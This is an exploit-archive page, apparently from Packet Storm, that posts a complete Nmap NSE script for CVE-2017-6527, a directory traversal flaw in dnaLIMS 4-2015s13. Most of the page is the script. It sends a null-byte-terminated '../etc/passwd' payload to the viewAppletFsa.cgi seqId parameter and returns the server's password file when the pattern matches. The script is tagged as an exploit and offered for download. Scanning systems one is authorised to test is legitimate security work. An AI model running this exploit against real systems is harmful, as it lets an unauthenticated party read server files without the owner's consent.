what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

dnaTools dnaLIMS 4-2015s13 Directory Traversal Nmap NSE Script

dnaTools dnaLIMS 4-2015s13 Directory Traversal Nmap NSE Script
Posted Apr 8, 2017
Authored by Rewanth Cool

This NSE script for Nmap exploits a directory traversal vulnerability in dnaTools dnaLIMS version 4-2015s13.

tags | exploit
advisories | CVE-2017-6527
SHA-256 | 14000eb7e96ae44276fb5bd1d81181a295942cd488c90f9058e76d64598d4a63

dnaTools dnaLIMS 4-2015s13 Directory Traversal Nmap NSE Script

Change Mirror Download
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
local nmap = require "nmap"

description = [[
dnaLIMS is prone to the Directory Traversal attack.
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]]

---
-- @usage
-- nmap --script http-vuln-cve2017-6527 <url>
--
-- @args
-- http-vuln-cve2017-6527.uri
-- Default: '/' (Suggested)
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-vuln-cve2017-6527
-- | VULNERABLE:
-- | dnaLIMS is prone to the Directory Traversal attack.
-- | State: VULNERABLE (Exploitable)
-- | IDs:
-- | CVE: CVE-2017-6527
-- | CWE: 22
-- | The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
-- | This allows an unauthenticated attacker to retrieve files on the operating system accessible by
-- | the permissions of the web server. This page also does not require authentication, allowing
-- | any person on the Internet to exploit this vulnerability.
-- |
-- | References:
-- | https://www.cvedetails.com/cve/CVE-2017-6527
-- | https://www.cvedetails.com/cwe-details/22/cwe.html
---

author = "Rewanth Cool"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "intrusive", "exploit"}

portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")

action = function(host, port)
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
local vulnPath = "cgi-bin/dna/viewAppletFsa.cgi?seqId=../../../../../../etc/passwd%00&Action=blast&hidenav=1"

-- Exploiting the vulnerability
local response = http.get( host, port, uri..vulnPath )

stdnse.debug1(string.format("GET request being processed with payload on %s", host..uri..vulnPath))

if( response.status == 200 ) then
local vulnReport = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = "dnaLIMS is prone to the Directory Traversal attack.",
state = vulns.STATE.NOT_VULN,
description = [[
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated directory traversal attack.
This allows an unauthenticated attacker to retrieve files on the operating system accessible by
the permissions of the web server. This page also does not require authentication, allowing
any person on the Internet to exploit this vulnerability.
]],
IDS = {
CVE = "CVE-2017-6527",
CWE = "22",
references = {
"https://www.cvedetails.com/cve/CVE-2017-6527",
"https://www.cvedetails.com/cwe-details/22/cwe.html"
},
dates = {
disclosure = {
year = "2017",
month = "03",
day = "09"
},
}
}
}

-- Matching the /etc/passwd pattern
if string.match( response.body, "([^:]+):([^:]+):([^:]+):([^:]+)::?([^:]+):([^:]+):([^:]+)" ) then
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = response.body
return vulnReport:make_output(vuln)
end
end
end

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close